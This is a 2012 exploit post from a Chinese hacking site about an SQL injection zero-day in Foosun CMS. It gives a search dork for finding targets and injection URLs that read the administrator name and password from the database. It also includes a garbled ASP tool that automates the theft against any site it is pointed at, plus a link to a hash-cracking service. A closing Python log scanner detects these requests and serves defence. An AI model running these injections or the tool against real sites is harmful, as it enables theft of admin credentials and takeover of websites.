Foosun CMS 0DAY exploit - Vulnerability warning - myhack58

2012-01-06T00:00:00
ID MYHACK58:62201232824
Type myhack58
Reporter Anonymous
Modified 2012-01-06T00:00:00

Description

Keywords: inurl:User/Reg_service.asp

The Foosun registration page...

Vulnerable page: /user/SetNextOptions.asp

Usage:

Construct the injection

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name”: the administrator user name field in the database table

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word”: the administrator password field in the database table

Put the following code into an ASP file and run it in a locally set up ASP environment.

DE><herd><title>foosun cms 0day exploits</title></herd><body><%web=request("web")id=request("id")%>keywords:member registration step 1 of 4 step<br><form action=" method=post>enter the address:< input type=text size=5 0 id=web name=web value="<%=web%>"><br>to storm ID number(default is 1)<input type=text size=3 name=id value="<%=id%>">ID 1 is the super administrator<br><input type=submit value="I'm going to storm"></form><form><% function bin2str(bin) dim tmp,ustr tmp="" for i=1 to LenB(bin)-1 ustr=AscB(MidB(bin,i,1)) if ustr>1 2 7 then i=i+1 tmp=tmp&chr(ustr*2 5 6+AscB(MidB(bin,i,1))) else tmp=tmp&chr(ustr) end if next bin2str=tmp end functionwebuser=web&"User/setnextoptions. asp? EquValue=1&ReqSql=select%2 0 1,ADMIN_name,3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1%20from%20FS_MF_ADMIN%20where% 20id="&amp; idwebpass=web&"User/setnextoptions. asp? EquValue=1&ReqSql=select%2 0 1,ADMIN_pass_word,3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1%20from%20FS_MF_ADMIN%20where% 20id="&amp; idif web="" thenelseset x=server. createObject("Microsoft. XMLHTTP") x. open "get",webuser,false x. send str=bin2str(x. responseBody)response. write "you storm website address:"&amp; web&"<br><br>"&id&"bits of the admin<br>"response. write "<br><a href='"&amp; web&"/Admin/login. asp' target=""_blank"">website background address</a><br>"for i=1 to 2 6 to len(str)mid1=mid1&mid(str,i,1)nextresponse. write "<br>------------------<br>account:"&mid1&"<br>"x. open "get",webpass,false x. send str=bin2str(x. responseBody)for i=1 to 2 6 to len(str)mid2=mid2&mid(str,i,1)next response. write "<br>password:"&amp; mid2&"<br>------------------<br>" response. 
write "<br>broke slightly, can YY.<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>" set x=nothingend if%>DE>

For the specific usage, refer to the source code.
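The requests above carry a complete SELECT statement in the ReqSql parameter of /user/SetNextOptions.asp, so they stand out in web server logs. The following log check is an added example, not part of the original advisory; the four-field log layout, the sample lines and the names classify and scan are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/user/setnextoptions.asp"  # vulnerable page named in the advisory, lower-cased
# Table and column names that the advisory's requests read from.
ADMIN_MARKERS = re.compile(r"fs_mf_admin|admin_name|admin_pass_word", re.I)

# Constructed sample lines in an assumed "method uri status client-ip" layout;
# adapt the field split in scan() to the field order of your own IIS logs.
SAMPLE_LOG = """\
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin 200 203.0.113.7
GET /User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3%20from%20FS_MF_ADMIN%20where%20id=1 200 203.0.113.7
GET /user/SetNextOptions.asp?sType=1&ReqSql=select+1,2+from+example_table 200 198.51.100.4
GET /user/SetNextOptions.asp?sType=1&EquValue=2&SelectName=city 200 198.51.100.4
GET /user/Reg_service.asp 200 198.51.100.9
"""

def classify(uri):
    """Return 'admin-table-read', 'client-sql' or None for one request URI."""
    parts = urlsplit(uri)
    if parts.path.lower() != VULN_PATH:
        return None
    # parse_qs decodes '+' and %XX, so differently encoded requests compare equal.
    # Parameter names are lower-cased because classic ASP treats them case-insensitively.
    params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    sql = " ".join(params.get("reqsql", []))
    if not sql:
        return None
    return "admin-table-read" if ADMIN_MARKERS.search(sql) else "client-sql"

def scan(log_text):
    """Return (client_ip, verdict, status) for every line that carries ReqSql."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed layout
        _method, uri, status, client = fields
        verdict = classify(uri)
        if verdict:
            hits.append((client, verdict, status))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A hit of type admin-table-read with status 200 means the administrator account should be treated as exposed and its password changed; client-sql hits mark any other request in which the client supplied the SQL text and need manual review.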